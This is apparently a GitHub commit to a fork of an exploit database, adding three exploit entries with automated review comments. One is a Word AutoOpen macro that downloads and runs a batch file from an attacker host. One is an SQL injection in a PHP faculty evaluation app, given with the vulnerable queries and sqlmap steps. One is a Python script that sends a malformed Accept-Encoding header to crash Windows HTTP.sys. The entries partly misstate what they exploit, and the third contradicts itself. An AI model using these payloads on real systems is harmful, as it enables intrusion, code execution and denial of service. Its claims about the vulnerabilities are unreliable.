forked from offensive-security/exploitdb
Merge remote-tracking branch 'upstream/main'
Showing 4 changed files with 163 additions and 2 deletions.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
@@ -0,0 +1,38 @@ | ||
## Title: Microsoft Outlook Microsoft 365 MSO (Version 2306 Build 16.0.16529.20100) 32-bit - Remote Code Execution | ||
## Author: nu11secur1ty | ||
## Date: 07.07.2023 | ||
## Vendor: https://www.microsoft.com/ | ||
## Software: https://outlook.live.com/owa/ | ||
## Reference: https://www.crowdstrike.com/cybersecurity-101/remote-code-execution-rce/ | ||
## CVE-2023-33131 | ||
|
||
|
||
## Description: | ||
In this vulnerability, the Microsoft Outlook app allows an attacker to | ||
send an infected Word file with malicious content | ||
to everyone who using the Outlook app, no matter web or local. | ||
Microsoft still doesn't have a patch against this 0-day vulnerability today. | ||
|
||
## Staus: HIGH Vulnerability | ||
|
||
[+]Exploit: | ||
|
||
- The malicious Word file: | ||
|
||
```js | ||
Sub AutoOpen() | ||
Call Shell("cmd.exe /S /c" & "curl -s | ||
https://attacker/namaikativputkata/sichko/nikoganqqsaopraite.bat > | ||
nikoganqqsaopraite.bat && .\nikoganqqsaopraite.bat", vbNormalFocus) | ||
End Sub | ||
|
||
``` | ||
|
||
## Reproduce: | ||
[href](https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2023/CVE-2023-33131) | ||
|
||
## Proof and Exploit | ||
[href](https://www.nu11secur1ty.com/2023/07/cve-2023-33131-microsoft-outlook.html) | ||
|
||
## Time spend: | ||
00:30:00 |
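Review bot: Nothing in this entry ties the payload to an Outlook flaw: the block shows a Word `AutoOpen` macro that shells out to `curl` to fetch and run a `.bat`, which is generic VBA macro behaviour and depends entirely on the recipient's macro settings, so the entry should explain what CVE-2023-33131 actually is and how the document relates to it. The Reference line points at a generic CrowdStrike explainer of RCE rather than the MSRC update-guide entry for the CVE (the third file in this commit uses the update guide, which is the right kind of reference), the Software link is the OWA sign-in page while the title names a specific 32-bit MSO desktop build, and the claim that "Microsoft still doesn't have a patch" is unsourced and should cite the advisory. Minor: the code fence is tagged ```js but the content is VBA, and "Staus" should read "Status".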
@@ -0,0 +1,50 @@ | ||
# Exploit Title: Faculty Evaluation System v1.0 - SQL Injection | ||
# Date: 07/2023 | ||
# Exploit Author: Andrey Stoykov | ||
# Vendor Homepage: https://www.sourcecodester.com/php/14635/faculty-evaluation-system-using-phpmysqli-source-code.html | ||
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/eval_2.zip | ||
# Version: 1.0 | ||
# Tested on: Windows Server 2022 | ||
|
||
|
||
SQLi #1 | ||
|
||
File: edit_evaluation | ||
|
||
Line #4 | ||
$qry = $conn->query("SELECT * FROM ratings where id = ".$_GET['id'])->fetch_array(); | ||
[...] | ||
|
||
|
||
SQLi #2 | ||
|
||
File: view_faculty.php | ||
|
||
Line #4 | ||
|
||
// Add "id" parameter after "view_faculty" parameter then add equals "id" with integer | ||
[...] | ||
$qry = $conn->query("SELECT *,concat(firstname,' ',lastname) as name FROM faculty_list where id = ".$_GET['id'])->fetch_array(); | ||
[...] | ||
|
||
|
||
Steps to Exploit: | ||
|
||
1. Login to application | ||
2. Browse to following URI "http://host/eval/index.php?page=view_faculty&id=1" | ||
3. Copy request to intercept proxy to file | ||
4. Exploit using SQLMap | ||
|
||
|
||
sqlmap -r test.txt --threads 1 --dbms=mysql --fingerprint | ||
|
||
[...] | ||
[INFO] testing MySQL | ||
[INFO] confirming MySQL | ||
[INFO] the back-end DBMS is MySQL | ||
[INFO] actively fingerprinting MySQL | ||
[INFO] executing MySQL comment injection fingerprint | ||
back-end DBMS: active fingerprint: MySQL >= 5.7 | ||
comment injection fingerprint: MySQL 5.6.49 | ||
fork fingerprint: MariaDB | ||
[...] |
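Review bot: Both vulnerable queries concatenate `$_GET['id']` straight into the SQL string (`... where id = ".$_GET['id']`), and the entry would be more useful to maintainers if it named the remediation: bind `id` as a parameter of a prepared statement, or cast it to an integer before use. The first finding lists the file as `edit_evaluation` without the `.php` extension the second finding uses, and only the second finding gets a request URI in the steps, so the page and parameter for SQLi #1 should be stated as well. Step 3, "Copy request to intercept proxy to file", reads awkwardly; "Capture the request in an intercepting proxy and save it to a file" is clearer.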
@@ -0,0 +1,70 @@ | ||
## Title: Windows 10 v21H1 - HTTP Protocol Stack Remote Code Execution | ||
## Author: nu11secur1ty | ||
## Date: 01.14.2022 | ||
## Vendor: https://www.microsoft.com/ | ||
## Software: https://www.microsoft.com/en-us/download/details.aspx?id=48264 | ||
## Reference: https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21907 | ||
## CVE-2022-21907 | ||
|
||
|
||
## Description: | ||
NOTE: After a couple of hours of tests and experiments, I found that | ||
there have been no vulnerabilities, this is just a ridiculous | ||
experiment of Microsoft. When I decided to install the IIS packages on | ||
these Windows platforms, everything was ok, and everything is patched! | ||
Windows Server 2019, Windows 10 version 1809 - 2018 year are not | ||
vulnerable by default, but after I decided to upgrade from 1909 to | ||
2004. I found a serious problem! The Windows 10 version 2004 - 2020 | ||
year is still vulnerable to the HTTP Protocol Stack (HTTP.sys). Attack | ||
method: buffer overflow - deny of service and restart the system. This | ||
problem exists, from last year which is reported on CVE-2021-31166, | ||
and still there! On that days I have worked on it again with the help | ||
and collaboration of Axel Souchet 0vercl0k the author of the idea. On | ||
that day, I wrote an only one-line command to exploit this | ||
vulnerability! | ||
|
||
[+]Exploit: | ||
```python | ||
#!/usr/bin/python | ||
# Author @nu11secur1ty | ||
# CVE-2022-21907 | ||
|
||
from colorama import init, Fore, Back, Style | ||
init(convert=True) | ||
import requests | ||
import time | ||
|
||
print(Fore.RED +"Please input your host...\n") | ||
print(Style.RESET_ALL) | ||
|
||
print(Fore.YELLOW) | ||
host = input() | ||
print(Style.RESET_ALL) | ||
|
||
print(Fore.BLUE +"Sending of especially malicious crafted packages, | ||
please wait...") | ||
print(Style.RESET_ALL) | ||
time.sleep(17) | ||
|
||
print(Fore.GREEN) | ||
# The PoC :) | ||
poc = requests.get(f'http://{host}/', headers = {'Accept-Encoding': | ||
'AAAAAAAAAAAAAAAAAAAAAAAA,\ | ||
BBBBBBcccACCCACACATTATTATAASDFADFAFSDDAHJSKSKKSKKSKJHHSHHHAY&AU&**SISODDJJDJJDJJJDJJSU**S,\ | ||
RRARRARYYYATTATTTTATTATTATSHHSGGUGFURYTIUHSLKJLKJMNLSJLJLJSLJJLJLKJHJVHGF,\ | ||
TTYCTCTTTCGFDSGAHDTUYGKJHJLKJHGFUTYREYUTIYOUPIOOLPLMKNLIJOPKOLPKOPJLKOP,\ | ||
OOOAOAOOOAOOAOOOAOOOAOOOAOO,\ | ||
****************************stupiD, *, ,',}) | ||
# Not necessary :) | ||
print(poc,"\n") | ||
print(Style.RESET_ALL) | ||
``` | ||
|
||
## Reproduce: | ||
[href](https://github.com/nu11secur1ty/Windows10Exploits/tree/master/2022/CVE-2022-21907) | ||
|
||
## Proof and Exploit | ||
[href](https://www.nu11secur1ty.com/2022/01/cve-2022-21907.html) | ||
|
||
## Time spend: | ||
05:30:00 |
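Review bot: The title, header and description disagree on what this entry is: the title says Windows 10 v21H1 Remote Code Execution, the description says the test was on version 2004 and that the attack method is a buffer overflow causing denial of service and a restart, and it opens by stating that no vulnerability was found before stating that one exists. The entry should name one tested version, describe the impact as DoS if that is what was observed, and spell out how the behaviour relates to the cited CVE-2021-31166. Style: the 17-second `time.sleep` runs before the single request is sent, so the "please wait" message describes nothing that is happening.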